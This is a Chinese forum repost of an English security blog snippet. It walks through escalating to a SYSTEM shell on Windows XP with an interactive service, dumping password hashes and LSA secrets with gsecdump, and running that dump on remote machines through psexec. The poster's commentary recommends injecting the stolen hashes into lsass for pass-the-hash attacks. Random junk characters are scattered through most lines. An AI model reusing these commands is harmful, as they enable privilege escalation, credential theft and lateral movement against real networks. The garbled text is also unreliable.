o get a DOS Prompt as NT system:3 ]) ~$ I* r$ l* @6 m
. _2 @; G, D: o, D5 f6 N1 w
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
1 ?: {' j3 u- ]1 {[SC] CreateService SUCCESS6 J6 ^# M0 W% F0 }; s! _* d( X8 Y$ G
' m5 b' Y d1 F9 AC:\>sc start shellcmdline
! z" G. ~3 H4 l) ^: e[SC] StartService FAILED 1053:
& K, j8 j' \. e; S
" |' y! {/ _* E& k" J. d4 mThe service did not respond to the start or control request in a timely fashion.- n$ c' ?* [0 N
. i: k' N+ o; Q( G" S- m3 EC:\>sc delete shellcmdline+ G& j& G1 t: J1 `" x
[SC] DeleteService SUCCESS- ~$ x7 Q) m' A$ N! S
9 G% V4 `; x% J' t% a: j------------7 t) u# Y7 d% R+ H* N+ ~/ F
4 ^6 c! O" O; O
Then in the new DOS window:
4 F" M8 @' h; r$ R+ j) o( J; D' N% H7 j
Microsoft Windows XP [Version 5.1.2600]
4 o; o: U6 u; h1 I# ~( G& ~(C) Copyright 1985-2001 Microsoft Corp.) a' y4 S. E9 d$ k: t/ ~( o
3 E0 X" Q3 {0 |4 K
C:\WINDOWS\system32>whoami
6 H; D, ^5 u1 L; I1 O6 E* ]. ], w7 J. LNT AUTHORITY\SYSTEM' C S; m2 a: F( H
7 Z0 p0 ~! W$ U/ E/ T- N8 R
C:\WINDOWS\system32>gsecdump -h3 s, `. o: E$ r
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
& {& v. r S6 S6 P/ Nusage: gsecdump [options]9 S* S& }: q- t2 \
3 Q3 p: M5 G. d7 z! poptions:
! }, M4 W8 ]6 g' r+ v& N, h-h [ --help ] show help
# S# a8 P% N! n$ _5 ?3 N-a [ --dump_all ] dump all secrets- L# O% D& _9 M4 D: I. _
-l [ --dump_lsa ] dump lsa secrets
( Y( V+ B- Y8 u6 J-w [ --dump_wireless ] dump microsoft wireless connections$ i# N, p U# I( X, E2 f
-u [ --dump_usedhashes ] dump hashes from active logon sessions2 `9 N8 \: h3 @" J {* |
-s [ --dump_hashes ] dump hashes from SAM/AD
3 e; G" s; B9 i5 i$ X
; u: i1 h' t! I+ C9 Y1 _! eAlthough I like to use:
, P/ v2 t0 w) T$ m: E
: K6 s: S1 E% i: a. d" n- xPsExec v1.83 - Execute processes remotely; p( [) D0 E+ |1 h9 `
Copyright (C) 2001-2007 Mark Russinovich
8 s8 [4 n) O: u" j7 dSysinternals - 链接标记[url]www.sysinternals.com[/url]3 _5 S/ h% l: c4 G0 _2 } m
5 n3 p/ d5 y) [- O3 e$ h, {: lC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
8 Q& t0 i4 V$ `/ V* W% h
$ A: [4 o' P: Q. rto get the hashes from active logon sessions of a remote system.
4 {, O/ _6 f! p, A% F q. C$ T0 C8 R, q6 X6 v
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
) l+ P6 `/ n0 |& [# v F6 z
: Y7 @. n$ s- I# H9 L; u提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
* n3 H) d' v- n6 b原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]+ Y$ u* }' b x" m; P/ m7 x
; `; b" i. i, V B
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
) l' I" |6 b8 A1 L |
发表于 2012-11-6 21:09:29
收藏
支持
反对